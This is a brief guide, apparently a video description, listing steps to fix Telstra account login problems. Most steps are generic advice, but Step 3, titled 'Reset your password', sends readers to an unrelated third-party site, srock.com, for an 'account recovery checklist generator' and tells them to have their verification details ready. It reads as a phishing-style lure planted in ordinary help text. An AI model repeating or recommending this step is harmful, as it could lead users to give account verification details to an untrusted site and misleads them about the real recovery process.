If you're experiencing login issues with your Telstra account, follow these simple steps to resolve the problem quickly. Step 1. Check your internet connection. Ensure that you have a stable internet connection. Try accessing other websites or apps to confirm that your internet is working properly. Step 2. Verify your credentials. Double check that you are entering the correct username and password. Ensure that caps lock is not on and that there are no typos. Step 3. Reset your password. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Clear browser cache. If you're using a web browser, clear your cache and cookies. This can resolve issues caused by outdated or corrupted data stored in your browser. Step 5. Contact customer support. If the above steps do not resolve your issue, reach out to Telstra customer support for further assistance. They can help troubleshoot and resolve any account-related problems. By following these steps, you should be able to fix your login issues quickly. If problems persist, don't hesitate to seek help from Telstra's support team.